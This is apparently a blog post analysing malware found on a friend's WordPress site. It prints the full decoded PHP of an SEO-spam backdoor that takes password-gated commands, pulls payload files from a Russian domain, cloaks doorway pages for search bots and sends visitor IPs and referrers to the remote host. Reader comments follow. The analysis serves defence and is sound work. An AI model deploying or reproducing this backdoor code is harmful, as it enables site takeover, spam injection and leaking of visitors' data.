rLiImbWs9Ii5yYXd1cmxlbmNvZGUoJGtleXdvcmQpLiImYmFzZT0iLnJhd3VybGVuY29kZSgkYmFzZSkuIiZkPSIucmF3dXJsZW5jb2RlKCRob3N0KS4iJnU9Ii5yYXd1cmxlbmNvZGUoJHVyeCkuIiZhZGRyPSIuJG15aXAuIiZyZWY9Ii5yYXd1cmxlbmNvZGUoJHJlZiksJHVhKTsNCgkJCX1lbHNlew0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCQl9DQoJCQllY2hvICRidWY7ZXhpdDsNCgkJfQ0KCX1lbHNlew0KDQoJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCWVjaG8gJGJ1ZjtleGl0Ow0KCX0NCg0KfQ0K
If I base64 decode this I get:
set_time_limit(0);
function get_val($a0){
$i=@array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["$a0"])?$i["$a0"]:(isset($i["HTTP_".strtoupper($a0)])?$i["HTTP_".strtoupper($a0)]:"");
return $a;
}
function change_page_regex($page, $links,$reg,$res){
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links)>0){
$element = "<p>";
$element .= implode("<br>\n", $links);
$element .= "</p>";
$page = preg_replace('/\<\/body\>/i', "\n" . $element . "\n$0", $page, 1);
}
return $page;
}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
$curly_page_get_info=curl_getinfo($ch);
curl_close($ch);
return array($result,$curly_page_get_info);
}
function get_proxy_page($phead=1){
$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type'];
$nexturl=@$curly_page_get_info['redirect_url'];
$status=@$curly_page_get_info['http_code'];
if (status!="")header("Status: $status");
if ($phead)header("X-CF-RAYX: ".substr(md5(time()),0,10));
if ($ct!=""){
header("Content-type: $ct");
}
if ($nexturl!=""){
header("Location: $nexturl");
}
return array($buf,$ct);
}
function get_db_path(){
if (stristr(PHP_OS,"win")){
return sys_get_temp_dir();
}
$default_dirs = array(
'wp-includes/SimplePie/Content',
'wp-includes/js/tinymce/plugins',
'wp-content/plugins/akismet/_inc/img',
'administrator/components/com_media/views/images',
'libraries/cms/html/language',
'media/editors/tinymce/js/plugins',
'tmp',
'wp-content/uploads'
);
foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d);
$current_dir = opendir('.');
while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
closedir($current_dir);
if (is_writable('.')) return ('.');
$tmp_dir = sys_get_temp_dir();
if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir;
return ".";
}
$content="";
$x=get_val("pppp_check");
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=strtolower(@$_SERVER["HTTP_HOST"]);
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);
$xmd5="/.".$md5host."/";
$cfile="emoji1.png";
if (!@file_exists(".".$xmd5.$cfile)){
$tmppath=get_db_path();
}else{
$tmppath=".";
}
$tmppath=$tmppath.$xmd5;@mkdir($tmppath);
$configs=$tmppath.$cfile;
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
@ini_set('memory_limit','1600M');
$domain=base64_decode("aW5kaWthdGVpdC5ydQ==");
$p="";
if ($x!="")$p=md5(@base64_decode(get_val("p")));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){
echo "###UPDATING_FILES###\n";
$ur="http://".$domain."/images/".$md5host."/";
list($buf1,$t)=@curly_page_get($ur."emoji1.png");@file_put_contents($configs,$buf1);
list($buf1,$t)=@curly_page_get($ur."metaicons.jpg");@file_put_contents($bd,$buf1);
list($buf1,$t)=@curly_page_get($ur."wp-themesall.gif");@file_put_contents($templ,$buf1);
echo "###UPDATED###\n";
exit;
}
if ($x=="4"){
echo "###WORKED###\n";exit;
}
if ($x=="5"){
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(@base64_decode(@file_get_contents($configs)));
}
$out=array(
'cf' => $cf,
'server' => $_SERVER,
'file' => __FILE__,
'configfile' => $configs,
'db_file_size' => is_file($bd) ? filesize($bd) : 0,
'template_file_size' => is_file($templ) ? filesize($templ) : 0,
);
echo base64_encode(serialize($out));
exit;
}
}else{
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(@base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])){
$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
$off=$cf[$md5urx]+0;
$template=@base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f));@fclose($f);$info=unserialize(base64_decode($buf));
$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])){$contenttype=@base64_decode($info["contenttype"]);$types=explode("\n",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){
$doorcontent=base64_decode($text);
echo $doorcontent;exit;
}else{
if ((isset($info["nr"]))&&(is_array($info["nr"]))){
foreach($info["nr"] as $mark => $repl){
$template=str_replace($mark,$repl,$template);
}
}else{
$template=str_replace("%text%",$text,$template);
$template=str_replace("%title%",$title,$template);
$template=str_replace("%description%",$description,$template);
$template=str_replace("%uckeyword%",$uckeyword,$template);
$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){
$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
}
}
echo $template;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){
$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
$links=$info["links_a"];
$buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1;
$links=$info["links_p"];
$buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf;exit;
}
}
if ($se) {
if (isset($info["isdoor"])){
list($buf,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
}else{
list($buf,$ct)=get_proxy_page();
}
echo $buf;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;exit;
}
}
Immediately, I notice $domain
which is a base64 encoded string, which when decoded gives:
indikateit.ru
I'm guessing this is the server which the allegedly malcious scripts post information to.
This decoded base64 script references $_COOKIE
, $_SERVER
& $_REQUEST
, the same variables which the first file referenced.
Update: Upon googling some of the base64 decoded code, I found a link on UnPHP of someone who deobfuscated similar code
However, the domain in this one was hlemovka.ru
Top comments (3)
Nice job!
I've a question: how does this code ended up on the server of your friend?
For now, my conclusion is: don't use Wordpress. I've so many requests on my server trying to connect to the Wordpress admin (even if my website is not a wordpress), it's insane.
Thanks for the comment.
My friend thinks it may be to do with his comment fields: potentially not sanitizing inputs.
Just noticed this issue on our own site. Might want to check the web.config file too.
boyet.com/blog/godaddy-shared-wind...